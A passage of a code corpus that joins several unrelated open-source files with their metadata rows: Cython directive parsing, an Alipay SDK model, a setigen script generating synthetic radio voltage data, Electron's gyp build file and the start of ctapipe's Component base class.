    'warn.unreachable': True,
    'warn.maybe_uninitialized': False,
    'warn.unused': False,
    'warn.unused_arg': False,
    'warn.unused_result': False,

# optimizations
    'optimize.inline_defnode_calls': True,

# remove unreachable code
    'remove_unreachable': True,

# control flow debug directives
    'control_flow.dot_output': "", # Graphviz output filename
    'control_flow.dot_annotate_defs': False, # Annotate definitions

# test support
    'test_assert_path_exists' : [],
    'test_fail_if_path_exists' : [],

# experimental, subject to change
    'binding': None,
    'experimental_cpp_class_def': False,
    'freelist': 0,
}

# Extra warning directives
# Enabled on top of the defaults when the user requests extra warnings.
extra_warnings = {
    'warn.maybe_uninitialized': True,
    'warn.unreachable': True,
    'warn.unused': True,
}
def one_of(*args):
    """Build a directive validator that accepts only the given values.

    The returned callable takes (name, value), returns the value unchanged
    when it is allowed, and raises ValueError otherwise.
    """
    def validate(name, value):
        if value in args:
            return value
        raise ValueError("%s directive must be one of %s, got '%s'" % (
            name, args, value))
    return validate
def normalise_encoding_name(option_name, encoding):
    """Map a codec name onto its canonical spelling where one exists.

    'default', 'ascii' and 'utf8' (any casing) normalise to lowercase;
    aliases that Python's codec registry resolves to the ascii or utf8
    decoder are canonicalised; anything else is returned unchanged, since
    it may still exist at runtime.

    >>> normalise_encoding_name('c_string_encoding', 'us-ascii')
    'ascii'
    >>> normalise_encoding_name('c_string_encoding', 'utF-8')
    'utf8'
    >>> normalise_encoding_name('c_string_encoding', 'deFAuLT')
    'default'
    >>> normalise_encoding_name('c_string_encoding', 'SeriousLyNoSuch--Encoding')
    'SeriousLyNoSuch--Encoding'
    """
    if not encoding:
        return ''
    lowered = encoding.lower()
    if lowered in ('default', 'ascii', 'utf8'):
        return lowered
    import codecs
    try:
        decoder = codecs.getdecoder(encoding)
    except LookupError:
        return encoding  # may exists at runtime ...
    for canonical_name in ('ascii', 'utf8'):
        if codecs.getdecoder(canonical_name) == decoder:
            return canonical_name
    return encoding
# Override types possibilities above, if needed
# Explicit value types/validators for directives whose default value's type
# would not make a suitable validator (callables both validate and normalise).
directive_types = {
    'final' : bool,  # final cdef classes and methods
    'internal' : bool,  # cdef class visibility in the module dict
    'infer_types' : bool, # values can be True/None/False
    'binding' : bool,
    'cfunc' : None, # decorators do not take directive value
    'ccall' : None,
    'cclass' : None,
    'returns' : type,
    'set_initial_path': str,
    'freelist': int,
    'c_string_type': one_of('bytes', 'str', 'unicode'),
    'c_string_encoding': normalise_encoding_name,
}

# For every directive without an explicit entry above, the type of its
# default value serves as the validator type.
for key, val in directive_defaults.items():
    if key not in directive_types:
        directive_types[key] = type(val)

directive_scopes = { # defaults to available everywhere
    # 'module', 'function', 'class', 'with statement'
    'final' : ('cclass', 'function'),
    'internal' : ('cclass',),
    'autotestdict' : ('module',),
    'autotestdict.all' : ('module',),
    'autotestdict.cdef' : ('module',),
    'set_initial_path' : ('module',),
    'test_assert_path_exists' : ('function', 'class', 'cclass'),
    'test_fail_if_path_exists' : ('function', 'class', 'cclass'),
    'freelist': ('cclass',),
    # Avoid scope-specific to/from_py_functions for c_string.
    'c_string_type': ('module',),
    'c_string_encoding': ('module',),
    'type_version_tag': ('module', 'cclass'),
}
def parse_directive_value(name, value, relaxed_bool=False):
    """
    Parses value as an option value for the given name and returns
    the interpreted value. None is returned if the option does not exist.

    >>> print parse_directive_value('nonexisting', 'asdf asdfd')
    None
    >>> parse_directive_value('boundscheck', 'True')
    True
    >>> parse_directive_value('boundscheck', 'true')
    Traceback (most recent call last):
       ...
    ValueError: boundscheck directive must be set to True or False, got 'true'

    >>> parse_directive_value('c_string_encoding', 'us-ascii')
    'ascii'
    >>> parse_directive_value('c_string_type', 'str')
    'str'
    >>> parse_directive_value('c_string_type', 'bytes')
    'bytes'
    >>> parse_directive_value('c_string_type', 'unicode')
    'unicode'
    >>> parse_directive_value('c_string_type', 'unnicode')
    Traceback (most recent call last):
    ValueError: c_string_type directive must be one of ('bytes', 'str', 'unicode'), got 'unnicode'
    """
    # Renamed from `type` to avoid shadowing the builtin, which the body
    # itself needs conceptually (callable(...) check below).
    directive_type = directive_types.get(name)
    if not directive_type:
        return None
    orig_value = value
    if directive_type is bool:
        value = str(value)
        if value == 'True':
            return True
        if value == 'False':
            return False
        if relaxed_bool:
            value = value.lower()
            if value in ("true", "yes"):
                return True
            elif value in ("false", "no"):
                return False
        raise ValueError("%s directive must be set to True or False, got '%s'" % (
            name, orig_value))
    elif directive_type is int:
        try:
            return int(value)
        except ValueError:
            raise ValueError("%s directive must be set to an integer, got '%s'" % (
                name, orig_value))
    elif directive_type is str:
        return str(value)
    elif callable(directive_type):
        # Custom validator/normaliser (e.g. one_of, normalise_encoding_name).
        return directive_type(name, value)
    else:
        assert False  # every entry in directive_types is one of the above
def parse_directive_list(s, relaxed_bool=False, ignore_unknown=False,
                         current_settings=None):
    """
    Parse a comma separated list of ``name=value`` pragma options.
    Whitespace around the entries is ignored.

    >>> parse_directive_list('  ')
    {}
    >>> (parse_directive_list('boundscheck=True') ==
    ... {'boundscheck': True})
    True
    >>> parse_directive_list('  asdf')
    Traceback (most recent call last):
       ...
    ValueError: Expected "=" in option "asdf"
    >>> parse_directive_list('boundscheck=hey')
    Traceback (most recent call last):
       ...
    ValueError: boundscheck directive must be set to True or False, got 'hey'
    >>> parse_directive_list('unknown=True')
    Traceback (most recent call last):
       ...
    ValueError: Unknown option: "unknown"
    """
    # Update the caller-supplied dict in place when one is given.
    result = {} if current_settings is None else current_settings
    for entry in s.split(','):
        entry = entry.strip()
        if not entry:
            continue
        if '=' not in entry:
            raise ValueError('Expected "=" in option "%s"' % entry)
        name, value = (part.strip() for part in entry.split('=', 1))
        parsed = parse_directive_value(name, value, relaxed_bool=relaxed_bool)
        if parsed is None:
            # parse_directive_value returns None only for unknown directives.
            if not ignore_unknown:
                raise ValueError('Unknown option: "%s"' % name)
        else:
            result[name] = parsed
    return result
| 34.572755 | 116 | 0.672696 |
795ae8a0a688faf77f661418b44ce96ae6edc348 | 947 | py | Python | alipay/aop/api/domain/AlipayUserAntpaasAddtesttagModifyModel.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/domain/AlipayUserAntpaasAddtesttagModifyModel.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/domain/AlipayUserAntpaasAddtesttagModifyModel.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class AlipayUserAntpaasAddtesttagModifyModel(object):
    """Request model for the alipay.user.antpaas.addtesttag.modify API.

    Carries a single optional field, ``account_no``, and converts between
    the model and the plain-dict form used on the wire.
    """

    def __init__(self):
        self._account_no = None

    @property
    def account_no(self):
        return self._account_no

    @account_no.setter
    def account_no(self, value):
        self._account_no = value

    def to_alipay_dict(self):
        """Serialize the model to a plain dict, omitting unset fields."""
        params = {}
        account_no = self.account_no
        if account_no:
            # Nested models know how to serialize themselves.
            if hasattr(account_no, 'to_alipay_dict'):
                params['account_no'] = account_no.to_alipay_dict()
            else:
                params['account_no'] = account_no
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a response dict; returns None for empty input."""
        if not d:
            return None
        model = AlipayUserAntpaasAddtesttagModifyModel()
        if 'account_no' in d:
            model.account_no = d['account_no']
        return model
| 23.097561 | 71 | 0.615628 |
795ae8b7efc092a864a8ec12ba30bdf632f12c26 | 6,596 | py | Python | raw_voltage_dev/gen_snr_actual_5min.py | bbrzycki/setigen_development | 37e2c83e70ec8b693be08ecc3957a9a735b2ce5a | [
"MIT"
] | null | null | null | raw_voltage_dev/gen_snr_actual_5min.py | bbrzycki/setigen_development | 37e2c83e70ec8b693be08ecc3957a9a735b2ce5a | [
"MIT"
] | null | null | null | raw_voltage_dev/gen_snr_actual_5min.py | bbrzycki/setigen_development | 37e2c83e70ec8b693be08ecc3957a9a735b2ce5a | [
"MIT"
] | null | null | null | import numpy as np
import blimpy as bl
import pandas as pd
from astropy import units as u
try:
import cupy as xp
except ImportError:
import numpy as xp
import sys, os, glob, errno
import csv
import json
import h5py
import time
from astropy.stats import sigma_clip
from scipy.signal import butter, lfilter, filtfilt
import scipy.signal
sys.path.insert(0, "/home/bryanb/setigen/")
import setigen as stg
def db(x):
    """Convert a linear power value to decibels (10 * log10(x))."""
    return np.log10(x) * 10
############################################################
def get_unit_drift_rate(raw_voltage_backend, fftlength=1048576, int_factor=1):
    """Return the drift rate (Hz/s) corresponding to a shift of one fine
    channel per integrated time bin.

    Computed as the fine-channel frequency resolution divided by the time
    resolution of the integrated spectra.
    """
    freq_res = raw_voltage_backend.chan_bw / fftlength
    time_res = raw_voltage_backend.tbin * fftlength * int_factor
    return freq_res / time_res
def get_intensity(snr, raw_voltage_backend, fftlength=1048576, int_factor=1):
    """Return the per-sample signal level needed to reach *snr* in the
    integrated spectra produced by *raw_voltage_backend*.

    The noise statistics follow a chi-squared distribution with
    ``2 * num_pols * int_factor`` degrees of freedom, averaged over the
    number of time bins in one data block.
    """
    time_res = raw_voltage_backend.tbin * fftlength * int_factor
    tchans = raw_voltage_backend.time_per_block / time_res
    chi_df = 2 * raw_voltage_backend.num_pols * int_factor
    # Intensity contribution of one unit of SNR after averaging tchans bins.
    intensity_per_snr = np.sqrt(2 / chi_df) / tchans**0.5
    return 1 / (raw_voltage_backend.num_branches * fftlength / 4)**0.5 * (snr * intensity_per_snr)**0.5
############################################################
# Wall-clock timer so total generation time can be reported at the end.
start = time.time()

# --- Backend / instrument parameters ---
sample_rate = 3e9
num_taps = 8
num_branches = 1024
chan_bw = sample_rate/num_branches  # coarse channel bandwidth (Hz)

# 8-bit quantization of the real-valued voltage stream.
digitizer = stg.voltage.RealQuantizer(target_fwhm=32,
                                      num_bits=8)

filterbank = stg.voltage.PolyphaseFilterbank(num_taps=num_taps,
                                             num_branches=num_branches)

# Re-quantization of the complex channelized voltages to 8 bits.
requantizer = stg.voltage.ComplexQuantizer(target_fwhm=32,
                                           num_bits=8)

num_pols = 2

# Params for high res data product
fftlength = 1048576
int_factor = 51

antenna = stg.voltage.Antenna(sample_rate=sample_rate,
                              fch1=0,
                              ascending=True,
                              num_pols=num_pols)

rvb = stg.voltage.RawVoltageBackend(antenna,
                                    digitizer=digitizer,
                                    filterbank=filterbank,
                                    requantizer=requantizer,
                                    start_chan=0,
                                    num_chans=64,
                                    block_size=134217728,
                                    blocks_per_file=128,
                                    num_subblocks=16)

# Compute relevant quantities with helper functions above
unit_drift_rate = stg.get_unit_drift_rate(rvb, fftlength, int_factor)
signal_level = stg.get_intensity(10, rvb, fftlength, int_factor)  # level for SNR 10

# Inject Gaussian noise plus a grid of test signals into each polarization
# stream.  Frequencies are expressed in fine channels: chan_bw / fftlength
# is the width of one fine channel; the "(N+x-0.5)" factors place signals
# at offset x within coarse channel N.
for stream in antenna.streams:
    stream.add_noise(v_mean=0,
                     v_std=1)

    # Zero-drift signal aligned with a fine-channel bin in coarse channel 2.
    stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(2+0.3-0.5)),
                               drift_rate=0*u.Hz/u.s,
                               level=signal_level)
    # # stream.add_constant_signal(f_start=chan_bw / fftlength * (int(fftlength*(2+0.6-0.5))),
    # #                            drift_rate=0*u.Hz/u.s,
    # #                            level=signal_level)
    # Five zero-drift signals spaced 20 fine channels apart.
    for i in range(5):
        stream.add_constant_signal(f_start=chan_bw / fftlength * (int(fftlength*(2+0.3-0.5))+20*i),
                                   drift_rate=0*u.Hz/u.s,
                                   level=signal_level)

    # Signals deliberately offset from bin centers; the 1/np.sinc(...) factor
    # presumably compensates FFT scalloping loss at that fractional offset
    # (note sinc(0.3) for the 0.7 offset = distance to the nearest bin) --
    # TODO confirm against the setigen documentation.
    stream.add_constant_signal(f_start=chan_bw / fftlength * (0.1+int(fftlength*(3+0.3-0.5))),
                               drift_rate=0*u.Hz/u.s,
                               level=signal_level * 1/np.sinc(0.1))
    stream.add_constant_signal(f_start=chan_bw / fftlength * (20+0.1+int(fftlength*(3+0.3-0.5))),
                               drift_rate=0*u.Hz/u.s,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * (0.7+int(fftlength*(3+0.6-0.5))),
                               drift_rate=0*u.Hz/u.s,
                               level=signal_level * 1/np.sinc(0.3))
    stream.add_constant_signal(f_start=chan_bw / fftlength * (20+0.7+int(fftlength*(3+0.6-0.5))),
                               drift_rate=0*u.Hz/u.s,
                               level=signal_level)

    # Drifting signals at 1x, 2x, 4x and 8x the unit drift rate (one fine
    # channel per integrated time bin), each with a fractionally offset twin.
    stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(4+0.2-0.5)),
                               drift_rate=unit_drift_rate,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * (0.1+int(fftlength*(4+0.6-0.5))),
                               drift_rate=unit_drift_rate,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(5+0.2-0.5)),
                               drift_rate=2*unit_drift_rate,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * (0.5+int(fftlength*(5+0.6-0.5))),
                               drift_rate=2*unit_drift_rate,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(7+0.2-0.5)),
                               drift_rate=4*unit_drift_rate,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * (0.5+int(fftlength*(7+0.6-0.5))),
                               drift_rate=4*unit_drift_rate,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(9+0.2-0.5)),
                               drift_rate=8*unit_drift_rate,
                               level=signal_level)
    stream.add_constant_signal(f_start=chan_bw / fftlength * (0.5+int(fftlength*(9+0.6-0.5))),
                               drift_rate=8*unit_drift_rate,
                               level=signal_level)

# Record to file
rvb.record(raw_file_stem='/datax/scratch/bbrzycki/data/raw_files/test_snr_actual_5min',
           obs_length=300,
           length_mode='obs_length',
           header_dict={'HELLO': 'test_value',
                        'TELESCOP': 'GBT'})

print(time.time() - start)  # total generation time in seconds
print(rvb.total_obs_num_samples)
print(rvb.sample_stage, rvb.digitizer_stage, rvb.filterbank_stage, rvb.requantizer_stage)
795ae97e9f0c61b67515bd6d01742c217f18d68a | 16,969 | gyp | Python | atom.gyp | sencha/electron | 71598e15bf0ca2fd8de338d864cc37776608c6c2 | [
"MIT"
] | 1 | 2016-11-07T16:43:43.000Z | 2016-11-07T16:43:43.000Z | atom.gyp | sencha/electron | 71598e15bf0ca2fd8de338d864cc37776608c6c2 | [
"MIT"
] | null | null | null | atom.gyp | sencha/electron | 71598e15bf0ca2fd8de338d864cc37776608c6c2 | [
"MIT"
] | 2 | 2015-07-18T09:31:03.000Z | 2019-12-24T09:55:03.000Z | {
'variables': {
'project_name%': 'electron',
'product_name%': 'Electron',
'company_name%': 'GitHub, Inc',
'company_abbr%': 'github',
'version%': '0.27.3',
'atom_source_root': '<!(["python", "tools/atom_source_root.py"])',
},
'includes': [
'filenames.gypi',
'vendor/native_mate/native_mate_files.gypi',
],
'target_defaults': {
'defines': [
'ATOM_PRODUCT_NAME="<(product_name)"',
'ATOM_PROJECT_NAME="<(project_name)"',
],
'mac_framework_dirs': [
'<(atom_source_root)/external_binaries',
],
},
'targets': [
{
'target_name': '<(project_name)',
'type': 'executable',
'dependencies': [
'compile_coffee',
'<(project_name)_lib',
],
'sources': [
'<@(app_sources)',
],
'include_dirs': [
'.',
],
'conditions': [
['OS=="mac"', {
'product_name': '<(product_name)',
'mac_bundle': 1,
'dependencies!': [
'<(project_name)_lib',
],
'dependencies': [
'<(project_name)_framework',
'<(project_name)_helper',
'vendor/breakpad/breakpad.gyp:dump_syms',
],
'xcode_settings': {
'ATOM_BUNDLE_ID': 'com.<(company_abbr).<(project_name)',
'INFOPLIST_FILE': 'atom/browser/resources/mac/Info.plist',
'LD_RUNPATH_SEARCH_PATHS': [
'@executable_path/../Frameworks',
],
},
'mac_bundle_resources': [
'<@(bundle_sources)',
],
'copies': [
{
'destination': '<(PRODUCT_DIR)/<(product_name).app/Contents/Frameworks',
'files': [
'<(PRODUCT_DIR)/<(product_name) Helper.app',
'<(PRODUCT_DIR)/<(product_name) Framework.framework',
'external_binaries/Squirrel.framework',
'external_binaries/ReactiveCocoa.framework',
'external_binaries/Mantle.framework',
],
},
{
'destination': '<(PRODUCT_DIR)/<(product_name).app/Contents/Resources',
'files': [
'atom/browser/default_app',
],
},
],
'postbuilds': [
{
# This postbuid step is responsible for creating the following
# helpers:
#
# <(product_name) EH.app and <(product_name) NP.app are created
# from <(product_name).app.
#
# The EH helper is marked for an executable heap. The NP helper
# is marked for no PIE (ASLR).
'postbuild_name': 'Make More Helpers',
'action': [
'vendor/brightray/tools/mac/make_more_helpers.sh',
'Frameworks',
'<(product_name)',
],
},
# The application doesn't have real localizations, it just has
# empty .lproj directories, which is enough to convince Cocoa
# atom-shell supports those languages.
{
'postbuild_name': 'Make Empty Localizations',
'variables': {
'apply_locales_cmd': ['python', 'tools/mac/apply_locales.py'],
'locale_dirs': [
'>!@(<(apply_locales_cmd) -d ZZLOCALE.lproj <(locales))',
],
},
'action': [
'tools/mac/make_locale_dirs.sh',
'<@(locale_dirs)',
],
},
]
}, { # OS=="mac"
'dependencies': [
'make_locale_paks',
],
}], # OS!="mac"
['OS=="win"', {
'copies': [
{
'variables': {
'conditions': [
['libchromiumcontent_component', {
'copied_libraries': [
'<@(libchromiumcontent_shared_libraries)',
'<@(libchromiumcontent_shared_v8_libraries)',
],
}, {
'copied_libraries': [
'<(libchromiumcontent_dir)/pdf.dll',
],
}],
],
},
'destination': '<(PRODUCT_DIR)',
'files': [
'<@(copied_libraries)',
'<(libchromiumcontent_dir)/ffmpegsumo.dll',
'<(libchromiumcontent_dir)/libEGL.dll',
'<(libchromiumcontent_dir)/libGLESv2.dll',
'<(libchromiumcontent_dir)/icudtl.dat',
'<(libchromiumcontent_dir)/content_resources_200_percent.pak',
'<(libchromiumcontent_dir)/content_shell.pak',
'<(libchromiumcontent_dir)/ui_resources_200_percent.pak',
'<(libchromiumcontent_dir)/natives_blob.bin',
'<(libchromiumcontent_dir)/snapshot_blob.bin',
'external_binaries/d3dcompiler_47.dll',
'external_binaries/xinput1_3.dll',
'external_binaries/msvcp120.dll',
'external_binaries/msvcr120.dll',
'external_binaries/vccorlib120.dll',
],
},
{
'destination': '<(PRODUCT_DIR)/resources',
'files': [
'atom/browser/default_app',
]
},
],
}], # OS=="win"
['OS=="linux"', {
'copies': [
{
'variables': {
'conditions': [
['libchromiumcontent_component', {
'copied_libraries': [
'<(PRODUCT_DIR)/lib/libnode.so',
'<@(libchromiumcontent_shared_libraries)',
'<@(libchromiumcontent_shared_v8_libraries)',
],
}, {
'copied_libraries': [
'<(PRODUCT_DIR)/lib/libnode.so',
],
}],
],
},
'destination': '<(PRODUCT_DIR)',
'files': [
'<@(copied_libraries)',
'<(libchromiumcontent_dir)/libffmpegsumo.so',
'<(libchromiumcontent_dir)/icudtl.dat',
'<(libchromiumcontent_dir)/content_shell.pak',
'<(libchromiumcontent_dir)/natives_blob.bin',
'<(libchromiumcontent_dir)/snapshot_blob.bin',
],
},
{
'destination': '<(PRODUCT_DIR)/resources',
'files': [
'atom/browser/default_app',
]
},
],
}], # OS=="linux"
],
}, # target <(project_name)
{
'target_name': '<(project_name)_lib',
'type': 'static_library',
'dependencies': [
'atom_coffee2c',
'vendor/brightray/brightray.gyp:brightray',
'vendor/node/node.gyp:node',
],
'defines': [
# This is defined in skia/skia_common.gypi.
'SK_SUPPORT_LEGACY_GETTOPDEVICE',
# Disable warnings for g_settings_list_schemas.
'GLIB_DISABLE_DEPRECATION_WARNINGS',
# Defined in Chromium but not exposed in its gyp file.
'V8_USE_EXTERNAL_STARTUP_DATA',
'ENABLE_PLUGINS',
# Needed by Node.
'NODE_WANT_INTERNALS=1',
],
'sources': [
'<@(lib_sources)',
],
'include_dirs': [
'.',
'chromium_src',
'vendor/brightray',
'vendor/native_mate',
# Include atom_natives.h.
'<(SHARED_INTERMEDIATE_DIR)',
# Include directories for uv and node.
'vendor/node/src',
'vendor/node/deps/http_parser',
'vendor/node/deps/uv/include',
# The `node.h` is using `#include"v8.h"`.
'<(libchromiumcontent_src_dir)/v8/include',
# The `node.h` is using `#include"ares.h"`.
'vendor/node/deps/cares/include',
# The `third_party/WebKit/Source/platform/weborigin/SchemeRegistry.h` is using `platform/PlatformExport.h`.
'<(libchromiumcontent_src_dir)/third_party/WebKit/Source',
],
'direct_dependent_settings': {
'include_dirs': [
'.',
],
},
'export_dependent_settings': [
'vendor/brightray/brightray.gyp:brightray',
],
'conditions': [
['libchromiumcontent_component', {
'link_settings': {
'libraries': [ '<@(libchromiumcontent_v8_libraries)' ],
},
}],
['OS=="win"', {
'sources': [
'<@(lib_sources_win)',
],
'link_settings': {
'libraries': [
'-limm32.lib',
'-loleacc.lib',
'-lComdlg32.lib',
'-lWininet.lib',
],
},
'dependencies': [
# Node is built as static_library on Windows, so we also need to
# include its dependencies here.
'vendor/node/deps/cares/cares.gyp:cares',
'vendor/node/deps/http_parser/http_parser.gyp:http_parser',
'vendor/node/deps/uv/uv.gyp:libuv',
'vendor/node/deps/zlib/zlib.gyp:zlib',
# Build with breakpad support.
'vendor/breakpad/breakpad.gyp:breakpad_handler',
'vendor/breakpad/breakpad.gyp:breakpad_sender',
],
}], # OS=="win"
['OS=="mac"', {
'dependencies': [
'vendor/crashpad/client/client.gyp:crashpad_client',
'vendor/crashpad/handler/handler.gyp:crashpad_handler',
],
}], # OS=="mac"
['OS=="linux"', {
'link_settings': {
'ldflags': [
# Make binary search for libraries under current directory, so we
# don't have to manually set $LD_LIBRARY_PATH:
# http://serverfault.com/questions/279068/cant-find-so-in-the-same-directory-as-the-executable
'-rpath \$$ORIGIN',
# Make native module dynamic loading work.
'-rdynamic',
],
},
# Required settings of using breakpad.
'cflags_cc': [
'-Wno-empty-body',
'-Wno-reserved-user-defined-literal',
],
'include_dirs': [
'vendor/breakpad/src',
],
'dependencies': [
'vendor/breakpad/breakpad.gyp:breakpad_client',
],
}], # OS=="linux"
],
}, # target <(product_name)_lib
{
'target_name': 'compile_coffee',
'type': 'none',
'actions': [
{
'action_name': 'compile_coffee',
'variables': {
'conditions': [
['OS=="mac"', {
'resources_path': '<(PRODUCT_DIR)/<(product_name).app/Contents/Resources',
},{
'resources_path': '<(PRODUCT_DIR)/resources',
}],
],
},
'inputs': [
'<@(coffee_sources)',
],
'outputs': [
'<(resources_path)/atom.asar',
],
'action': [
'python',
'tools/coffee2asar.py',
'<@(_outputs)',
'<@(_inputs)',
],
}
],
}, # target compile_coffee
{
'target_name': 'atom_coffee2c',
'type': 'none',
'actions': [
{
'action_name': 'atom_coffee2c',
'inputs': [
'<@(coffee2c_sources)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/atom_natives.h',
],
'action': [
'python',
'tools/coffee2c.py',
'<@(_outputs)',
'<@(_inputs)',
],
}
],
}, # target atom_coffee2c
],
'conditions': [
['OS=="mac"', {
'targets': [
{
'target_name': '<(project_name)_framework',
'product_name': '<(product_name) Framework',
'type': 'shared_library',
'dependencies': [
'<(project_name)_lib',
],
'sources': [
'<@(framework_sources)',
],
'include_dirs': [
'.',
'vendor',
'<(libchromiumcontent_src_dir)',
],
'export_dependent_settings': [
'<(project_name)_lib',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'external_binaries/Squirrel.framework',
'external_binaries/ReactiveCocoa.framework',
'external_binaries/Mantle.framework',
],
},
'mac_bundle': 1,
'mac_bundle_resources': [
'atom/common/resources/mac/MainMenu.xib',
'<(libchromiumcontent_dir)/content_shell.pak',
'<(libchromiumcontent_dir)/icudtl.dat',
'<(libchromiumcontent_dir)/natives_blob.bin',
'<(libchromiumcontent_dir)/snapshot_blob.bin',
],
'xcode_settings': {
'ATOM_BUNDLE_ID': 'com.<(company_abbr).<(project_name).framework',
'INFOPLIST_FILE': 'atom/common/resources/mac/Info.plist',
'LD_DYLIB_INSTALL_NAME': '@rpath/<(product_name) Framework.framework/<(product_name) Framework',
'LD_RUNPATH_SEARCH_PATHS': [
'@loader_path/Libraries',
],
'OTHER_LDFLAGS': [
'-ObjC',
],
},
'copies': [
{
'variables': {
'conditions': [
['libchromiumcontent_component', {
'copied_libraries': [
'<(PRODUCT_DIR)/libnode.dylib',
'<@(libchromiumcontent_shared_libraries)',
'<@(libchromiumcontent_shared_v8_libraries)',
],
}, {
'copied_libraries': [
'<(PRODUCT_DIR)/libnode.dylib',
],
}],
],
},
'destination': '<(PRODUCT_DIR)/<(product_name) Framework.framework/Versions/A/Libraries',
'files': [
'<@(copied_libraries)',
'<(libchromiumcontent_dir)/ffmpegsumo.so',
],
},
{
'destination': '<(PRODUCT_DIR)/<(product_name) Framework.framework/Versions/A/Resources',
'files': [
'<(PRODUCT_DIR)/crashpad_handler',
],
},
],
'postbuilds': [
{
'postbuild_name': 'Fix path of libnode',
'action': [
'install_name_tool',
'-change',
'/usr/local/lib/libnode.dylib',
'@rpath/libnode.dylib',
'${BUILT_PRODUCTS_DIR}/<(product_name) Framework.framework/Versions/A/<(product_name) Framework',
],
},
{
'postbuild_name': 'Add symlinks for framework subdirectories',
'action': [
'tools/mac/create-framework-subdir-symlinks.sh',
'<(product_name) Framework',
'Libraries',
],
},
],
}, # target framework
{
'target_name': '<(project_name)_helper',
'product_name': '<(product_name) Helper',
'type': 'executable',
'dependencies': [
'<(project_name)_framework',
],
'sources': [
'<@(app_sources)',
],
'include_dirs': [
'.',
],
'mac_bundle': 1,
'xcode_settings': {
'ATOM_BUNDLE_ID': 'com.<(company_abbr).<(project_name).helper',
'INFOPLIST_FILE': 'atom/renderer/resources/mac/Info.plist',
'LD_RUNPATH_SEARCH_PATHS': [
'@executable_path/../../..',
],
},
}, # target helper
],
}, { # OS=="mac"
'targets': [
{
'target_name': 'make_locale_paks',
'type': 'none',
'actions': [
{
'action_name': 'Make Empty Paks',
'inputs': [
'tools/make_locale_paks.py',
],
'outputs': [
'<(PRODUCT_DIR)/locales'
],
'action': [
'python',
'tools/make_locale_paks.py',
'<(PRODUCT_DIR)',
'<@(locales)',
],
'msvs_cygwin_shell': 0,
},
],
},
],
}], # OS!="mac"
],
}
| 33.207436 | 115 | 0.45813 |
795aea1c587f002b64fb153a12fcd6d72b59591f | 5,202 | py | Python | ctapipe/core/component.py | Pluto9th/ctapipe | 8c4faa674a1949210cbda8cb9e2413dd6362afea | [
"BSD-3-Clause"
] | null | null | null | ctapipe/core/component.py | Pluto9th/ctapipe | 8c4faa674a1949210cbda8cb9e2413dd6362afea | [
"BSD-3-Clause"
] | null | null | null | ctapipe/core/component.py | Pluto9th/ctapipe | 8c4faa674a1949210cbda8cb9e2413dd6362afea | [
"BSD-3-Clause"
] | null | null | null | """ Class to handle configuration for algorithms """
from abc import ABCMeta
from logging import getLogger
from inspect import isabstract
from traitlets.config import Configurable
from traitlets import TraitError
from ctapipe.core.plugins import detect_and_import_io_plugins
def non_abstract_children(base):
    """
    Return all non-abstract subclasses of a base class recursively.

    Parameters
    ----------
    base : class
        High level class object that is inherited by the
        desired subclasses

    Returns
    -------
    non_abstract : list
        list of all non-abstract subclasses
    """
    # Gather direct subclasses once, then recurse into each of them.
    # (The original called base.__subclasses__() twice.)
    direct = base.__subclasses__()
    subclasses = direct + [
        g for s in direct
        for g in non_abstract_children(s)
    ]
    # Keep only concrete classes; isabstract() drops ABCs that still have
    # unimplemented abstract methods.
    non_abstract = [g for g in subclasses if not isabstract(g)]

    return non_abstract
class AbstractConfigurableMeta(type(Configurable), ABCMeta):
    '''
    Metaclass to be able to make Component abstract
    see: http://stackoverflow.com/a/7314847/3838691
    '''
    # Combining the traitlets metaclass with ABCMeta avoids the metaclass
    # conflict that would otherwise occur when a class inherits from
    # Configurable while also declaring @abstractmethod members.
    pass
class Component(Configurable, metaclass=AbstractConfigurableMeta):
    """Base class of all Components.

    Components are classes that are configurable via traitlets
    and setup a logger in the ctapipe logging hierarchy.

    `traitlets` can validate values and provide defaults and
    descriptions. These will be automatically translated into
    configuration parameters (command-line, config file, etc). Note
    that any parameter that should be externally configurable must
    have its `config` attribute set to `True`, e.g. defined like
    `myparam = Integer(0, help='the parameter').tag(config=True)`.

    All components also contain a `logger` instance in their `log`
    attribute, that you must use to output info, debugging data,
    warnings, etc (do not use `print()` statements, instead use
    `self.log.info()`, `self.log.warn()`, `self.log.debug()`, etc).

    Components are generally used within `ctapipe.core.Tool`
    subclasses, which provide configuration handling and command-line
    tool generation.

    For example:

    .. code:: python

        from ctapipe.core import Component
        from traitlets import (Integer, Float)

        class MyComponent(Component):
            \"\"\" Does something \"\"\"
            some_option = Integer(default_value=6,
                                  help='a value to set').tag(config=True)

        comp = MyComponent()
        comp.some_option = 6      # ok
        comp.some_option = 'test' # will fail validation
    """

    def __init__(self, config=None, parent=None, **kwargs):
        """
        Parameters
        ----------
        config : traitlets.loader.Config
            Configuration specified by config file or cmdline arguments.
            Used to set traitlet values.
        parent: Tool or Component
            If a Component is created by another Component or Tool,
            you need to pass the creating Component as parent, e.g.
            `parent=self`. This makes sure the config is correctly
            handed down to the child components.
            Do not pass config in this case.
        kwargs
            Traitlets to be overridden.
            TraitError is raised if kwargs contains a key that does not
            correspond to a traitlet.
        """
